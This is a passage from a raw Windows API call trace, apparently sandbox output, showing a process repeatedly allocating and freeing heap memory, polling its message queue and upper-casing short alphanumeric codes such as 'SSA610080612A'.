(HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0261.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0261.549] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0261.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.550] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.550] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.550] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0261.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.552] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.552] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.552] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0261.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0261.552] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.552] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0261.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.553] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.553] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.554] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.554] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.554] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.554] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0261.554] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0261.554] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.555] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.555] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0261.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.556] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0261.556] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0261.556] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.559] 